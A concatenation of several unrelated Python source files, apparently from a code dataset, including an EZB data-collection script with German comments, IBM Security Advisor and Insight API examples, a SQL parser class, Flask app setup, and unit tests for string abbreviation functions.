# https://www.crummy.com/software/BeautifulSoup/bs4/doc/ einlesen
parsed_html = BeautifulSoup(request.content, features="lxml")
# im p-Tag den JSON-formatierten Inhalt einlesen. Da dort manchmal Hinweise stehen, das ganze in einen try-
# catch-Block einfassen. Falls der Inhalt sich nicht als JSON einlesen lässt, wird ein leeres Feld
# zurückgegeben. Ansonsten wird das Feld "coll_id" aus dem JSON-Teil ausgelesen und zurückgegeben
try:
json_object = json.loads(parsed_html.find("p").get_text())
return json_object['coll_id']
except:
return ''
# falls der Aufruf der Seite keinen Erfolg hatte (status is nicht 200) wird ein leeres Feld zurückgegeben.
else:
return ""
def collect_data(filename):
# der Pfad zu der Originaldatei, in diesem Fall im Unterordner data/input, ausgehend von dem Ort dieser Datei
path = 'data/input/{}'.format(filename)
# Lese die Datei ein, dabei aufpassen, dass die package:collection-Spalte als Text eingelesen wird
df = pd.read_excel(path, dtype={'package:collection': str, 'zdb_id': str})
# alle "Not a number" (nan) durch leere Textfelder ersetzen
df = df.replace(np.nan, "", regex=True)
# Liste der zu schreibenden Reihen vorbereiten
extended_rows = []
# alle Spalten abarbeiten
for index, row in df.iterrows():
# für jeden hundertsten Eintrag den aktuellen Stand auf der Kommandozeile angeben.
if index % 100 == 0:
print("processing line {} of {}".format(index, len(df)))
# die ezb collection id abfragen durch Aufruf der oben definierten Funktion
ezb_collection_id = get_ezb_id(row['package:collection'])
# als neuen Wert in die Spalte "collection_id" eintragen
row['collection_id'] = ezb_collection_id
# diese Reihe der Liste der zu schreibenden Reihen anhängen
extended_rows.append(row)
# die Liste der zu schreibenden Reihen in ein Pandas-Dataframe umwandeln
output_df = pd.DataFrame(extended_rows)
# das Dataframe in eine Datei schreiben. diese heißt genauso wie die Ursprungsdatei, mit vorgehängtem "out_" und
# befindet sich im Ordner data/output relativ zu dieser Datei
output_df.to_excel('data/output/out_{}'.format(filename))
# python-Standard-Startpunkt für das Skript
if __name__ == '__main__':
# der Dateiname der zu erweiternden Datei im Ordner data/input relativ zu dieser Datei
filename = 'Grunddaten_Essen'
# obige Funktion aufrufen und Daten sammeln
bubi_coredata.transform_coredata(filename, 'E')
|
py | 1a3f8c0522f5ad324f480da05570d126d4afa613 | from ibm_cloud_security_advisor import NotificationsApiV1
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
authenticator = IAMAuthenticator(
apikey='abc')
notifications_service =NotificationsApiV1(authenticator=authenticator)
notifications_service.set_service_url("https://us-south.secadvisor.cloud.ibm.com/notifications")
data = {
"name": "sdk_test_notification1",
"description": "test1 description",
"type": "Webhook",
"endpoint": "http://test.com",
"enabled": True,
"severity": [
"high",
"medium",
"low",
"critical"
],
"alert_source": [
{
"provider_name": "VA",
"finding_types": [
"ALL"
]
},
{
"provider_name": "CERT",
"finding_types": [
"ALL"
]
}
]
}
response = notifications_service.create_notification_channel(
account_id="abc",
**data
)
print(response)
|
py | 1a3f8c3bd14cf4a4e406c5bf30d764108a4911e2 | #! /usr/bin/env python
from os import environ
from insightlab import Insight, InsightObjects
TOKEN = environ.get("INSIGHT_TOKEN", "")
## Set login
i = Insight.API(TOKEN, "4")
## Load the object
my_server = i.load("IDLAB-5709")
print(f"Current hostname: {my_server.attribute_value_by_name('Hostname')}")
## Find the attribute's id
id = my_server.attribute_id_by_name("Hostname")
## Create the attribute object and add the value
attr = InsightObjects.Attributes(id)
attr.add_value("new_hostname.test.idlab.org")
## Update the attribute's value
i.update_attribute(my_server.id, attr)
# Reload the object
my_server = i.load("IDLAB-5709")
print(f"New hostname: {my_server.attribute_value_by_name('Hostname')}")
input("Press Enter to continue...")
# Reset to original
i.update_attribute(my_server.id, id, ["test.server.idlab.org"])
|
py | 1a3f8cb507513d44067eec796322a3c7cdca46da | # coding=utf-8
# Copyright 2018-2020 EVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from src.parser.statement import AbstractStatement
from src.parser.types import StatementType
from src.parser.table_ref import TableRef
from typing import List
from src.parser.types import ParserColumnDataType
class ColumnConstraintInformation:
def __init__(self):
self.nullable = False
self.default_value = None
self.primary = False
self.unique = False
class ColumnDefinition:
def __init__(self, col_name: str,
col_type: ParserColumnDataType, col_dim: List[int],
cci: ColumnConstraintInformation = None):
self._name = col_name
self._type = col_type
self._dimension = col_dim
#column constarint info
if cci is not None:
self._unique_column_constraint = cci.unique
self._nullable = cci.nullable
self._primary = cci.primary
self._default_value = cci.default_value
@property
def name(self):
return self._name
@property
def type(self):
return self._type
@property
def dimension(self):
return self._dimension
def __str__(self):
return '{} {} {}'.format(self._name, self._type, self._dimension)
def __eq__(self, other):
if not isinstance(other, ColumnDefinition):
# don't attempt to compare against unrelated types
return NotImplemented
return self.name == other.name and \
self.type == other.type and self.dimension == other.dimension
class CreateTableStatement(AbstractStatement):
"""Create Table Statement constructed after parsing the input query
Attributes:
TableRef: table reference in the create table statement
ColumnList: list of columns
"""
def __init__(self,
table_ref: TableRef,
if_not_exists: bool,
column_list: List[ColumnDefinition] = None):
super().__init__(StatementType.CREATE)
self._table_ref = table_ref
self._if_not_exists = if_not_exists
self._column_list = column_list
def __str__(self) -> str:
print_str = "CREATE TABLE {} ({}) ".format(self._table_ref,
self._if_not_exists)
return print_str
@property
def table_ref(self):
return self._table_ref
@property
def if_not_exists(self):
return self._if_not_exists
@property
def column_list(self):
return self._column_list
|
py | 1a3f8d02f27558dcd22c1f6e399f57f72a3eba4d | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from config import config_options
from flask_bootstrap import Bootstrap
from flask_login import LoginManager
from flask_uploads import UploadSet,configure_uploads,IMAGES
from flask_mail import Mail
mail = Mail()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
bootstrap = Bootstrap()
db = SQLAlchemy()
photos = UploadSet('photos', IMAGES)
def create_app(config_name):
# Initializing application
app = Flask(__name__)
#creating the app configurations
app.config.from_object(config_options[config_name])
#Registering the Blueprint
from .main import main as main_blueprint
#Initializing Flask Extensionsin_blueprint
app.register_blueprint(main_blueprint)
bootstrap.init_app(app)
db.init_app(app)
login_manager.init_app(app)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint,url_prefix = '/auth')
mail.init_app(app)
#setting config
# from .request import configure_request
# configure_r
# request(app)
#configure UploadSet
configure_uploads(app,photos)
#will add the views and the forms
from .main import views,error
return app
|
py | 1a3f8eb1e9eb121f82de09e971acfd8b927301c6 | from flask import Flask
from flask import render_template
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=True)
|
py | 1a3f90bbf02eac2145f98157c4f9340816ed14b8 | import mock
import contextlib
import locale
import unittest
from publish import *
from unittestresults import get_test_results
from junit import parse_junit_xml_files
from test import d, n
from unittestresults import get_stats, UnitTestCase, ParseError
@contextlib.contextmanager
def temp_locale(encoding) -> Any:
old_locale = locale.getlocale()
locale.setlocale(locale.LC_ALL, encoding)
try:
res = yield
finally:
locale.setlocale(locale.LC_ALL, old_locale)
return res
errors = [ParseError('file', 'error', 1, 2)]
class PublishTest(unittest.TestCase):
old_locale = None
def test_abbreviate_characters(self):
# None string
self.assertIsNone(abbreviate(None, 1))
# 1 byte utf8 characters
self.assertEqual('', abbreviate('', 1))
self.assertEqual('…', abbreviate('…', 1))
self.assertEqual('ab', abbreviate('ab', 3))
self.assertEqual('ab', abbreviate('ab', 2))
self.assertEqual('…', abbreviate('ab', 1))
self.assertEqual('abc', abbreviate('abc', 4))
self.assertEqual('abc', abbreviate('abc', 3))
self.assertEqual('a…', abbreviate('abc', 2))
self.assertEqual('…', abbreviate('abc', 1))
self.assertEqual('abcd', abbreviate('abcd', 4))
self.assertEqual('a…d', abbreviate('abcd', 3))
self.assertEqual('a…', abbreviate('abcd', 2))
self.assertEqual('…', abbreviate('abcd', 1))
self.assertEqual('abcde', abbreviate('abcde', 5))
self.assertEqual('ab…e', abbreviate('abcde', 4))
self.assertEqual('a…e', abbreviate('abcde', 3))
self.assertEqual('a…', abbreviate('abcde', 2))
self.assertEqual('…', abbreviate('abcde', 1))
self.assertEqual('abcdef', abbreviate('abcdef', 6))
self.assertEqual('ab…ef', abbreviate('abcdef', 5))
self.assertEqual('ab…f', abbreviate('abcdef', 4))
self.assertEqual('a…f', abbreviate('abcdef', 3))
self.assertEqual('a…', abbreviate('abcdef', 2))
self.assertEqual('…', abbreviate('abcdef', 1))
self.assertEqual('abcdefg', abbreviate('abcdefg', 7))
self.assertEqual('abc…fg', abbreviate('abcdefg', 6))
self.assertEqual('ab…fg', abbreviate('abcdefg', 5))
self.assertEqual('ab…g', abbreviate('abcdefg', 4))
self.assertEqual('a…g', abbreviate('abcdefg', 3))
self.assertEqual('a…', abbreviate('abcdefg', 2))
self.assertEqual('…', abbreviate('abcdefg', 1))
self.assertEqual('abcdefgh', abbreviate('abcdefgh', 8))
self.assertEqual('abc…fgh', abbreviate('abcdefgh', 7))
self.assertEqual('abc…gh', abbreviate('abcdefgh', 6))
self.assertEqual('ab…gh', abbreviate('abcdefgh', 5))
self.assertEqual('ab…h', abbreviate('abcdefgh', 4))
self.assertEqual('a…h', abbreviate('abcdefgh', 3))
self.assertEqual('a…', abbreviate('abcdefgh', 2))
self.assertEqual('…', abbreviate('abcdefgh', 1))
self.assertEqual('abcdefghijklmnopqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 27))
self.assertEqual('abcdefghijklmnopqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 26))
self.assertEqual('abcdefghijkl…opqrstuvwxyz', abbreviate('abcdefghijklmnopqrstuvwxyz', 25))
# 2 bytes utf8 characters
self.assertEqual('»»»»»', abbreviate('»»»»»', 5))
self.assertEqual('»»…»', abbreviate('»»»»»', 4))
self.assertEqual('»…»', abbreviate('»»»»»', 3))
self.assertEqual('»…', abbreviate('»»»»»', 2))
self.assertEqual('…', abbreviate('»»»»»', 1))
self.assertEqual('»»»»»»', abbreviate('»»»»»»', 6))
self.assertEqual('»»…»»', abbreviate('»»»»»»', 5))
self.assertEqual('»»…»', abbreviate('»»»»»»', 4))
self.assertEqual('»…»', abbreviate('»»»»»»', 3))
self.assertEqual('»…', abbreviate('»»»»»»', 2))
self.assertEqual('…', abbreviate('»»»»»»', 1))
# 3 bytes utf8 characters
self.assertEqual('▊▋▌▍▎', abbreviate('▊▋▌▍▎', 5))
self.assertEqual('▊▋…▎', abbreviate('▊▋▌▍▎', 4))
self.assertEqual('▊…▎', abbreviate('▊▋▌▍▎', 3))
self.assertEqual('▊…', abbreviate('▊▋▌▍▎', 2))
self.assertEqual('…', abbreviate('▊▋▌▍▎', 1))
self.assertEqual('▊▋▌▍▎▏', abbreviate('▊▋▌▍▎▏', 6))
self.assertEqual('▊▋…▎▏', abbreviate('▊▋▌▍▎▏', 5))
self.assertEqual('▊▋…▏', abbreviate('▊▋▌▍▎▏', 4))
self.assertEqual('▊…▏', abbreviate('▊▋▌▍▎▏', 3))
self.assertEqual('▊…', abbreviate('▊▋▌▍▎▏', 2))
self.assertEqual('…', abbreviate('▊▋▌▍▎▏', 1))
# 4 bytes utf8 characters
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 27))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 26))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 25))
# mixed utf bytes: lengths=[1, 2, 3, 4, 1, 2, 3, 4]
self.assertEqual('a»▉𝒂a»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 9))
self.assertEqual('a»▉𝒂a»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 8))
self.assertEqual('a»▉…»▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 7))
self.assertEqual('a»▉…▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 6))
self.assertEqual('a»…▉𝒂', abbreviate('a»▉𝒂a»▉𝒂', 5))
self.assertEqual('a»…𝒂', abbreviate('a»▉𝒂a»▉𝒂', 4))
self.assertEqual('a…𝒂', abbreviate('a»▉𝒂a»▉𝒂', 3))
self.assertEqual('a…', abbreviate('a»▉𝒂a»▉𝒂', 2))
self.assertEqual('…', abbreviate('a»▉𝒂a»▉𝒂', 1))
self.assertEqual('a»▉𝒂a»▉', abbreviate('a»▉𝒂a»▉', 8))
self.assertEqual('a»▉𝒂a»▉', abbreviate('a»▉𝒂a»▉', 7))
self.assertEqual('a»▉…»▉', abbreviate('a»▉𝒂a»▉', 6))
self.assertEqual('a»…»▉', abbreviate('a»▉𝒂a»▉', 5))
self.assertEqual('a»…▉', abbreviate('a»▉𝒂a»▉', 4))
self.assertEqual('a…▉', abbreviate('a»▉𝒂a»▉', 3))
self.assertEqual('a…', abbreviate('a»▉𝒂a»▉', 2))
self.assertEqual('…', abbreviate('a»▉𝒂a»▉', 1))
# invalid abbreviation lengths
self.assertRaises(ValueError, lambda: abbreviate('abc', 0))
self.assertRaises(ValueError, lambda: abbreviate('abc', -1))
def test_abbreviate_bytes(self):
# None string
self.assertIsNone(abbreviate_bytes(None, 3))
# even number of characters
# 4 bytes utf characters
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 105))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 104))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 103))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 102))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 101))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 100))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 99))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 98))
self.assertEqual('𝒂𝒃𝒄…𝒙𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 27))
self.assertEqual('𝒂𝒃𝒄…𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 26))
self.assertEqual('𝒂𝒃𝒄…𝒚𝒛', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 25))
self.assertEqual('𝒂…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 7))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 6))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 5))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 4))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚𝒛', 3))
# 1 byte utf characters
self.assertEqual('ab…yz', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 7))
self.assertEqual('ab…z', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 6))
self.assertEqual('a…z', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 5))
self.assertEqual('a…', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 4))
self.assertEqual('…', abbreviate_bytes('abcdefghijklmnopqrstuvwxyz', 3))
# mixed utf bytes: lengths=[1, 2, 3, 4, 4, 3, 2, 1]
self.assertEqual('a»▉𝒂𝒂▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 21))
self.assertEqual('a»▉𝒂𝒂▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 20))
self.assertEqual('a»▉𝒂…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 19))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 18))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 17))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 16))
self.assertEqual('a»▉…▉»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 15))
self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 14))
self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 13))
self.assertEqual('a»▉…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 12))
self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 11))
self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 10))
self.assertEqual('a»…»a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 9))
self.assertEqual('a»…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 8))
self.assertEqual('a»…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 7))
self.assertEqual('a…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 6))
self.assertEqual('a…a', abbreviate_bytes('a»▉𝒂𝒂▉»a', 5))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂𝒂▉»a', 4))
self.assertEqual('…', abbreviate_bytes('a»▉𝒂𝒂▉»a', 3))
# odd number of characters
# 4 bytes utf characters
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 101))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 100))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 99))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 98))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 97))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 96))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 95))
self.assertEqual('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌…𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 94))
self.assertEqual('𝒂𝒃𝒄…𝒘𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 27))
self.assertEqual('𝒂𝒃𝒄…𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 26))
self.assertEqual('𝒂𝒃𝒄…𝒙𝒚', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 25))
self.assertEqual('𝒂…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 7))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 6))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 5))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 4))
self.assertEqual('…', abbreviate_bytes('𝒂𝒃𝒄𝒅𝒆𝒇𝒈𝒉𝒊𝒋𝒌𝒍𝒎𝒏𝒐𝒑𝒒𝒓𝒔𝒕𝒖𝒗𝒘𝒙𝒚', 3))
# 1 byte utf characters
self.assertEqual('ab…xy', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 7))
self.assertEqual('ab…y', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 6))
self.assertEqual('a…y', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 5))
self.assertEqual('a…', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 4))
self.assertEqual('…', abbreviate_bytes('abcdefghijklmnopqrstuvwxy', 3))
# mixed utf bytes: lengths=[1, 2, 3, 4, 1, 2, 3]
self.assertEqual('a»▉𝒂a»▉', abbreviate_bytes('a»▉𝒂a»▉', 17))
self.assertEqual('a»▉𝒂a»▉', abbreviate_bytes('a»▉𝒂a»▉', 16))
self.assertEqual('a»▉…a»▉', abbreviate_bytes('a»▉𝒂a»▉', 15))
self.assertEqual('a»▉…»▉', abbreviate_bytes('a»▉𝒂a»▉', 14))
self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 13))
self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 12))
self.assertEqual('a»…»▉', abbreviate_bytes('a»▉𝒂a»▉', 11))
self.assertEqual('a»…▉', abbreviate_bytes('a»▉𝒂a»▉', 10))
self.assertEqual('a»…▉', abbreviate_bytes('a»▉𝒂a»▉', 9))
self.assertEqual('a…▉', abbreviate_bytes('a»▉𝒂a»▉', 8))
